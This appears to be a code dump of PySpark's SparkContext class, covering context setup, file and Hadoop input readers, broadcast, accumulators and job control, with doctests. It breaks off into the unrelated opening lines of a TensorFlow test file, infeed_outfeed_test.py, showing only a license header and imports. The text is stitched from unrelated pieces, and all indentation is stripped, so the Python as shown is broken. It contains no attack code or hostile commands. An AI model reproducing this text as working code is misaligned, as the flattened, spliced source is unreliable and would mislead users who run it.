def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represents the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] speficied in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
        Set a Java system property, such as spark.executor.memory. This must
        be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
@ignore_unicode_prefix
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
u'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
pass
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using xrange
is recommended if the input represents a range for performance.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, xrange):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
return xrange(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
def reader_func(temp_filename):
return self._jvm.PythonRDD.readRDDFromFile(self._jsc, temp_filename, numSlices)
jrdd = self._serialize_to_jvm(c, serializer, reader_func)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, serializer, reader_func):
"""
Calling the Java parallelize() method with an ArrayList is too slow,
because it sends O(n) Py4J commands. As an alternative, serialized
objects are written to a file and loaded through textFile().
"""
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
serializer.dump_stream(data, tempFile)
tempFile.close()
return reader_func(tempFile.name)
finally:
            # readRDDFromFile eagerly reads the file so we can delete right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using L{RDD.saveAsPickleFile} method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files::
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
then C{rdd} contains::
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
.. note:: Experimental
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
.. note:: Small files are preferred, large file is also allowable, but
may cause bad performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
.. note:: Experimental
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. C{PickleSerializer} is used to deserialize pickled objects on the Python side
        :param path: path to sequencefile
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter:
:param valueConverter:
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
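A minimal illustrative sketch (the configuration key and path are hypothetical;
since this method takes no path argument, the input is selected entirely through
the configuration dict)::
    conf = {"mapreduce.input.fileinputformat.inputdir": "hdfs://namenode/data"}
    rdd = sc.newAPIHadoopRDD(
        "org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
        "org.apache.hadoop.io.LongWritable",
        "org.apache.hadoop.io.Text",
        conf=conf)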
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
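A minimal illustrative sketch (the path is hypothetical; same call shape as
newAPIHadoopFile but with an old-API InputFormat)::
    rdd = sc.hadoopFile(
        "hdfs://namenode/data/input.txt",
        "org.apache.hadoop.mapred.TextInputFormat",
        "org.apache.hadoop.io.LongWritable",
        "org.apache.hadoop.io.Text")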
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
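A minimal illustrative sketch (the configuration key and path are hypothetical;
the input directory is supplied through the configuration dict)::
    conf = {"mapred.input.dir": "hdfs://namenode/data"}
    rdd = sc.hadoopRDD(
        "org.apache.hadoop.mapred.TextInputFormat",
        "org.apache.hadoop.io.LongWritable",
        "org.apache.hadoop.io.Text",
        conf=conf)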
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
[u'Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
first = rdds[0]._jrdd
rest = [x._jrdd for x in rdds[1:]]
return RDD(self._jsc.union(first, rest), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a
L{Broadcast<pyspark.broadcast.Broadcast>}
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
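A minimal sketch of typical use::
    b = sc.broadcast([1, 2, 3])
    b.value                      # [1, 2, 3]
    sc.parallelize([0, 0]).flatMap(lambda _: b.value).collect()
    # [1, 2, 3, 1, 2, 3]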
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an L{Accumulator} with the given initial value, using a given
L{AccumulatorParam} helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
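A minimal sketch of typical use::
    acc = sc.accumulator(0)
    sc.parallelize(range(5)).foreach(lambda x: acc.add(x))
    acc.value  # 10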
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The C{path} passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use
L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The C{path} passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
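A minimal illustrative sketch (the archive path and module name are hypothetical)::
    sc.addPyFile("hdfs://namenode/libs/deps.zip")
    # modules packaged in deps.zip can now be imported inside tasks, e.g.
    # rdd.map(lambda x: mymodule.transform(x))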
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
if sys.version > '3':
import importlib
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be a HDFS path if running on a cluster.
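A minimal illustrative sketch (the directory is hypothetical)::
    sc.setCheckpointDir("hdfs://namenode/checkpoints")
    rdd = sc.parallelize(range(10))
    rdd.checkpoint()  # materialized on the next action
    rdd.count()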
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use L{SparkContext.cancelJobGroup} to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> suppress = lock.acquire()
>>> suppress = threading.Thread(target=start_job, args=(10,)).start()
>>> suppress = threading.Thread(target=stop_job).start()
>>> suppress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
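A minimal illustrative sketch (the pool name is hypothetical; assumes the fair
scheduler is configured)::
    sc.setLocalProperty("spark.scheduler.pool", "production")
    # ... submit jobs from this thread ...
    sc.setLocalProperty("spark.scheduler.pool", None)  # clear the property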
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or None if it is missing. See
L{setLocalProperty}
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for the user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
                   "to 'true' to enable the Python profiler.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
                   "to 'true' to enable the Python profiler.")
def getConf(self):
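"""
Return a copy of this SparkContext's configuration as a SparkConf object.
"""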
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
infeed_outfeed_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import signal
import subprocess
import sys
from absl.testing import parameterized
from threading import Thread
import numpy as np
from tensorflow.compiler.plugin.poplar.tests import test_utils as tu
